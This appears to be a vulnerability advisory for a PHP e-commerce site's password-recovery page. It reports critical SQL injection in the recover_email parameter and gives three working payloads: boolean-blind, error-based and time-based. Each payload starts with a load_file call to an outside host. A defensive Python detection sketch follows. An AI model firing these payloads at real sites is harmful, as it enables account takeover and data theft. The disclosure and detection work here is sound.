Ecommerce-project-with-php-and-mysqli-Fruits-Bazar

Description:

The recover_email parameter of the user_password_recover.php page is vulnerable to three types of SQL injection attack. An attacker can gain access to all accounts on this system.

Status: CRITICAL

[+] Payloads:

---
Parameter: recover_email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mvga'='Mvga&u_pass_recover=Recover Password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND 'qfSm'='qfSm&u_pass_recover=Recover Password
---
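For defenders, a detection sketch for the request shapes listed above. It is an added example, not part of the original report or of the application's code. It parses a POST body, checks whether recover_email is a plain email address, and labels which technique a value resembles. The function name, regexes and sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Strict shape for a legitimate recover_email value (assumed policy).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# One signature per technique named in the report, plus the load_file lookup
# that prefixes every payload. Hypothetical patterns, matched case-insensitively.
SIGNATURES = {
    "boolean-based blind": re.compile(
        r"'\s*(?:OR|AND)\s+(?:NOT\s+)?(\d+)\s*=\s*\1\b", re.I),
    "error-based (FLOOR)": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "load_file UNC lookup": re.compile(r"load_file\s*\(\s*'\\\\", re.I),
}

def inspect_recover_request(body: str) -> dict:
    """Return email validity and matched technique labels for one POST body."""
    fields = parse_qs(body, keep_blank_values=True)  # decodes '+' and %xx
    value = fields.get("recover_email", [""])[0]
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return {"valid_email": bool(EMAIL_RE.fullmatch(value)), "techniques": hits}

# Constructed sample bodies, shortened from the payload shapes in the report.
SAMPLES = [
    "recover_email=user@example.com&u_pass_recover=Recover Password",
    "recover_email=a@example.net' OR NOT 9177=9177 AND 'HeFM'='HeFM"
    "&u_pass_recover=Recover Password",
    "recover_email=a@example.net' AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ)"
    " AND 'qfSm'='qfSm&u_pass_recover=Recover Password",
    r"recover_email=a@example.net'+(select load_file('\\\\host.example\\olg'))+''"
    "&u_pass_recover=Recover Password",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_recover_request(body))
```

Signature matching of this kind is a triage aid for logs or a WAF rule. The underlying defect is closed only when recover_email is bound as a parameter of a prepared statement instead of being concatenated into the query.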
